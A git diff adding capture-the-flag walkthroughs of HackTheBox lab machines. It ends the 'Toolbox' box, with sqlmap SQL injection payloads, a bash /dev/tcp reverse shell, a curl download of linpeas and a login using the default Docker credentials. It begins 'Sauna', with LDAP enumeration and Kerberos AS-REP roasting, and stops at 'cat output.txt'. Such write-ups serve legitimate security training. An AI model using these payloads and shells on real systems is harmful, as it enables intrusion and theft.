+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp FileZilla ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
+ | ftp-syst:
+ |_ SYST: UNIX emulated by FileZilla
+ 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
+ | 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
+ |_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
+ |_http-server-header: Apache/2.4.38 (Debian)
+ |_http-title: MegaLogistics
+ | ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
+ | Not valid before: 2020-02-18T17:45:56
+ |_Not valid after: 2021-02-17T17:45:56
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open microsoft-ds?
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7m50s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-06-07T15:51:45
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Now our nmap scan picked up port 443 so let's visit it:
+
+
+
+Our nmap scan also picked up the **admin.megalogistic.com** domain name from the self-signed SSL certificate, so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.236 admin.megalogistic.com' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping admin.megalogistic.com -c1
+ PING admin.megalogistic.com (10.10.10.236) 56(84) bytes of data.
+ 64 bytes from admin.megalogistic.com (10.10.10.236): icmp_seq=1 ttl=127 time=129 ms
+
+ --- admin.megalogistic.com ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 129.228/129.228/129.228/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ →
+
+
+
+Now before we check out the domain name let's also take a look at the FileZilla FTP server that our nmap scan picked up:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → ftp 10.10.10.236
+ Connected to 10.10.10.236.
+ 220-FileZilla Server 0.9.60 beta
+ 220-written by Tim Kosse (tim.kosse@filezilla-project.org)
+ 220 Please visit https://filezilla-project.org/
+ Name (10.10.10.236:nothing): anonymous
+ 331 Password required for anonymous
+ Password:
+ 230 Logged on
+ Remote system type is UNIX.
+ ftp> ls
+ 200 Port command successful
+ 150 Opening data channel for directory listing of "/"
+ -r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
+ 226 Successfully transferred "/"
+ ftp>
+
+
+As expected there is anonymous login allowed. And here we find a docker-toolbox executable file, so we are hinted towards the fact that this box is running docker containers. Now back to the domain name we just added:
+
+
+
+Here we see that we get an admin login page, and we see that guessing the password isn't going to work, so we try out basic SQL injections, to do so we use burpsuite to get the POST request:
+
+
+
+Here just right click, copy to file and you get the following:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/45 ] [~/HTB/Toolbox]
+ → ls -lash login.req
+ 4.0K -rw-r--r-- 1 nothing nothing 561 Jun 7 18:28 login.req
+
+ [ 10.10.14.13/23 ] [ /dev/pts/45 ] [~/HTB/Toolbox]
+ → cat login.req
+ POST / HTTP/1.1
+ Host: admin.megalogistic.com
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 29
+ Origin: https://admin.megalogistic.com
+ Connection: close
+ Referer: https://admin.megalogistic.com/
+ Cookie: PHPSESSID=5f60c9a2d0777eada696244e34c22bc5
+ Upgrade-Insecure-Requests: 1
+
+ username=admin&password;=admin
+
+
+
+Let's use sqlmap to enumerate for potential SQL injections:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sqlmap -r login.req --risk=3 --level=3 --batch --force-ssl
+ ___
+ __H__
+ ___ ___["]_____ ___ ___ {1.5.5#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 18:30:23 /2021-06-07/
+
+ [18:30:23] [INFO] parsing HTTP request from 'login.req'
+ [18:30:24] [INFO] testing connection to the target URL
+ [18:30:24] [INFO] testing if the target URL content is stable
+ [18:30:24] [INFO] target URL content is stable
+ [18:30:24] [INFO] testing if POST parameter 'username' is dynamic
+ [18:30:25] [WARNING] POST parameter 'username' does not appear to be dynamic
+ [18:30:25] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'PostgreSQL')
+ [18:30:25] [INFO] testing for SQL injection on POST parameter 'username'
+ it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+ for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] Y
+ [18:30:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ got a 302 redirect to 'https://admin.megalogistic.com:443/dashboard.php'. Do you want to follow? [Y/n] Y
+ redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
+ [18:30:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
+ [18:30:36] [INFO] POST parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
+ [18:30:36] [INFO] testing 'Generic inline queries'
+ [18:30:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
+ [18:30:37] [INFO] POST parameter 'username' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
+ [18:30:37] [INFO] testing 'PostgreSQL inline queries'
+ [18:30:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
+ [18:30:48] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
+ [18:30:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
+ [18:30:59] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
+ [18:30:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [18:30:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [18:31:04] [INFO] target URL appears to be UNION injectable with 2 columns
+ injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
+ [18:31:08] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
+ [18:31:08] [INFO] testing 'Generic UNION query (51) - 21 to 40 columns'
+ [18:31:12] [INFO] testing 'Generic UNION query (51) - 41 to 60 columns'
+ [18:31:17] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
+ POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 135 HTTP(s) requests:
+ ---
+ **Parameter: username (POST)**
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ **Payload: username=-9325' OR 5396=5396-- MhIJ &password;=admin**
+
+ Type: error-based
+ Title: PostgreSQL AND error-based - WHERE or HAVING clause
+ Payload: username=admin' AND 8746=CAST((CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (8746=8746) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- IKYc&password;=admin
+
+ Type: stacked queries
+ Title: PostgreSQL > 8.1 stacked queries (comment)
+ Payload: username=admin';SELECT PG_SLEEP(5)--&password;=admin
+
+ Type: time-based blind
+ Title: PostgreSQL > 8.1 AND time-based blind
+ Payload: username=admin' AND 2290=(SELECT 2290 FROM PG_SLEEP(5))-- sWjK&password;=admin
+ ---
+ [18:31:17] [INFO] the back-end DBMS is PostgreSQL
+ web server operating system: Linux Debian 10 (buster)
+ web application technology: PHP 7.3.14, Apache 2.4.38
+ back-end DBMS: PostgreSQL
+ [18:31:19] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/admin.megalogistic.com'
+
+ [*] ending @ 18:31:19 /2021-06-07/
+
+
+
+Here we see that sqlmap managed to pickup that this was a PostgreSQL database, let's see if we can spawn a shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sqlmap -r login.req --risk=3 --level=3 --batch --force-ssl --os-shell
+ ___
+ __H__
+ ___ ___[']_____ ___ ___ {1.5.5#stable}
+ |_ -| . [)] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 18:35:16 /2021-06-07/
+
+ [18:35:16] [INFO] parsing HTTP request from 'login.req'
+ [18:35:16] [INFO] resuming back-end DBMS 'postgresql'
+ [18:35:16] [INFO] testing connection to the target URL
+ sqlmap resumed the following injection point(s) from stored session:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ Payload: username=-9325' OR 5396=5396-- MhIJ&password;=admin
+
+ Type: error-based
+ Title: PostgreSQL AND error-based - WHERE or HAVING clause
+ Payload: username=admin' AND 8746=CAST((CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (8746=8746) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- IKYc&password;=admin
+
+ Type: stacked queries
+ Title: PostgreSQL > 8.1 stacked queries (comment)
+ Payload: username=admin';SELECT PG_SLEEP(5)--&password;=admin
+
+ Type: time-based blind
+ Title: PostgreSQL > 8.1 AND time-based blind
+ Payload: username=admin' AND 2290=(SELECT 2290 FROM PG_SLEEP(5))-- sWjK&password;=admin
+ ---
+ [18:35:16] [INFO] the back-end DBMS is PostgreSQL
+ web server operating system: Linux Debian 10 (buster)
+ web application technology: PHP 7.3.14, Apache 2.4.38
+ back-end DBMS: PostgreSQL
+ [18:35:16] [INFO] fingerprinting the back-end DBMS operating system
+ [18:35:17] [INFO] the back-end DBMS operating system is Linux
+ [18:35:18] [INFO] testing if current user is DBA
+ [18:35:18] [INFO] retrieved: '1'
+ [18:35:19] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
+ [18:35:19] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
+
+ os-shell> id
+ do you want to retrieve the command standard output? [Y/n/a] Y
+ [18:35:45] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
+
+ os-shell> which bash
+ do you want to retrieve the command standard output? [Y/n/a] Y
+ [18:39:18] [INFO] retrieved: '/bin/bash'
+
+
+
+And we can! Now that we can execute system commands as the postgres user let's get a bash reverse shell:
+
+
+ [term1]
+
+ os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.13/9001 0>&1'
+ do you want to retrieve the command standard output? [Y/n/a] Y
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.236] 50037
+ bash: cannot set terminal process group (934): Inappropriate ioctl for device
+ bash: no job control in this shell
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ id
+ id
+ uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)
+
+
+
+Now from let's get the user flag:
+
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ls ~
+ ls ~
+ 11
+ user.txt
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cat ~/user.txt
+ cat ~/user.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX flag.txt
+
+
+
+And that's it ! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we move on let's first upgrade our reverse shell to a fully interactive TTY:
+
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ which python python3 bash
+ which python python3 bash
+ /usr/bin/python3
+ /bin/bash
+
+ #spawn a TTY with python3
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+ #background the reverse shell (CTRL+Z)
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ^Z
+ [1] + 4044233 suspended nc -lvnp 9001
+
+ #set stty raw -echo and then fg the reverse shell once again
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → stty raw -echo ; fg
+ [1] + 4044233 continued nc -lvnp 9001
+
+ #export the TERM and SHELL variables
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ export TERM=screen-256color
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ export SHELL=bash
+
+ #set the TTY rows
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ stty rows 40 columns 125
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ reset
+
+
+
+Let's get linpeas.sh onto the box to enumerate it:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 1694k 0 --:--:-- --:--:-- --:--:-- 1694k
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ chmod +x /tmp/peas.sh
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ /tmp/peas.sh
+
+
+` 
+
+Scrolling through the output of linpeas we see the following:
+
+
+
+We're on a boot2docker debian container, and scrolling further we see the following:
+
+
+
+And here we see that the ip on the eth0 interface is 172.17.0.2. The previous hint Boot2Docker, is a distribution on VirtualBox, and the default credentials are **docker/tcuser** , we can guess that the docker host is at the **172.17.0.1** IP address.
+
+Warning, you will have to redo your reverse shell because the container is unstable:
+
+
+ bash: [1078: 2 (255)] tcsetattr: Inappropriate ioctl for device
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
+
+
+So let's spawn our reverse shell once more:
+
+
+ [term1]
+
+ os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.13/9001 0>&1'
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Toolbox]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.236] 50075
+ bash: cannot set terminal process group (2876): Inappropriate ioctl for device
+ bash: no job control in this shell
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
+ ssh docker@172.17.0.1
+ docker@172.17.0.1's password: tcuser
+
+ ( '>')
+ /) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
+ (/-_--_-\) www.tinycorelinux.net
+
+ docker@box:~$ id
+ id
+ uid=1000(docker) gid=50(staff) groups=50(staff),100(docker)
+
+
+
+And as expected we have been able to access the docker host with the default credentials! Now let's see if we can access the **C:\Users** folder mounted at **/c/Users**.
+
+
+ docker@box:~$ cd /c/Users
+ cd /c/Users
+
+ docker@box:/c/Users$ ls
+ ls
+ Administrator Default Public desktop.ini
+ All Users Default User Tony
+
+ docker@box:/c/Users$ cd Administrator
+ cd Administrator
+
+ docker@box:/c/Users/Administrator$ cd Desktop
+ cd Desktop
+
+ docker@box:/c/Users/Administrator/Desktop$ ls
+ ls
+ desktop.ini root.txt
+
+ docker@box:/c/Users/Administrator/Desktop$ cat root.txt
+ cat root.txt
+ ccXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/57.md b/Easy/57.md
new file mode 100644
index 0000000..a4bad49
--- /dev/null
+++ b/Easy/57.md
@@ -0,0 +1,540 @@
+# Sauna Writeup
+
+
+
+## Introduction :
+
+Sauna is an easy Windows Box released back in Febuary 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Sauna]
+ → nmap -vvv -p- 10.10.10.175 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 445/tcp on 10.10.10.175
+ Discovered open port 135/tcp on 10.10.10.175
+ Discovered open port 139/tcp on 10.10.10.175
+ Discovered open port 53/tcp on 10.10.10.175
+ Discovered open port 636/tcp on 10.10.10.175
+ Discovered open port 5985/tcp on 10.10.10.175
+ Discovered open port 88/tcp on 10.10.10.175
+ Discovered open port 49667/tcp on 10.10.10.175
+ Discovered open port 49673/tcp on 10.10.10.175
+ Discovered open port 80/tcp on 10.10.10.175
+ Discovered open port 3268/tcp on 10.10.10.175
+ Discovered open port 55898/tcp on 10.10.10.175
+ Discovered open port 464/tcp on 10.10.10.175
+ Discovered open port 49675/tcp on 10.10.10.175
+ Discovered open port 49686/tcp on 10.10.10.175
+ Discovered open port 389/tcp on 10.10.10.175
+ Discovered open port 593/tcp on 10.10.10.175
+ Discovered open port 9389/tcp on 10.10.10.175
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → nmap -sCV -p 53,135,139,389,445,636,3268,5985,464,593 10.10.10.175
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:39 CEST
+ Nmap scan report for 10.10.10.175
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Simple DNS Plus
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds?
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
+ 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7h07m50s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-06-08T14:47:18
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 48.80 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+It's basically a bank website, and going to the **About Us** page we see a list of potential usernames:
+
+
+
+So let's save the usernames in a textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → vim users.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → cat users.txt
+ FergusSmith
+ ShaunCoins
+ BowieTaylor
+ SophieDriver
+ HugoBear
+ StevenKerb
+
+ fsmith
+ skerb
+ hbear
+ sdriver
+ btaylor
+ scoins
+
+ fergus.smith
+ shaun.coins
+ bowie.taylor
+ hugo.bear
+ steven.kerb
+ sophie.driver
+
+ fergus_smith
+ shaun_coins
+ bowie_taylor
+ hugo_bear
+ steven_kerb
+ sophie_driver
+
+
+
+Now our nmap scan picked up the port 389 so let's enumerate it further:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → nmap -n -sV --script "ldap*" -p 389 10.10.10.175
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:41 CEST
+ Nmap scan report for 10.10.10.175
+ Host is up (0.030s latency).
+
+ PORT STATE SERVICE VERSION
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
+ | ldap-brute:
+ | root:empty> => Valid credentials
+ | admin:empty> => Valid credentials
+ | administrator:empty> => Valid credentials
+ | webadmin:empty> => Valid credentials
+ | sysadmin:empty> => Valid credentials
+ | netadmin:empty> => Valid credentials
+ | guest:empty> => Valid credentials
+ | user:empty> => Valid credentials
+ | web:empty> => Valid credentials
+ |_ test:empty> => Valid credentials
+
+ [...]
+
+ | msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | msDS-NcType: 0
+ | msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
+ | dc: EGOTISTICAL-BANK
+ | dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
+ |_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
+ Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+
+
+Just like we saw earlier, we see that the DC name is **EGOTISTICAL-BANK.LOCAL** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.175 egotistical-bank.local' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 egotistical-bank.local
+ PING egotistical-bank.local (10.10.10.175) 56(84) bytes of data.
+ 64 bytes from egotistical-bank.local (10.10.10.175): icmp_seq=1 ttl=127 time=27.7 ms
+
+ --- egotistical-bank.local ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 27.650/27.650/27.650/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ →
+
+
+
+Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.html) box.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → locate GetNPUsers.py
+ /home/nothing/HTB/Forest/GetNPUsers.py
+ /home/nothing/HTB/Forest/impacket/build/scripts-3.9/GetNPUsers.py
+ /home/nothing/HTB/Forest/impacket/examples/GetNPUsers.py
+ /usr/local/bin/GetNPUsers.py
+ /usr/local/lib/python3.9/dist-packages/impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3.9.egg/EGG-INFO/scripts/GetNPUsers.py
+ /usr/share/doc/python3-impacket/examples/GetNPUsers.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → **python3** /home/nothing/HTB/Forest/impacket/build/scripts-3.9/**GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users.txt -format john -outputfile output.txt**
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → cat output.txt
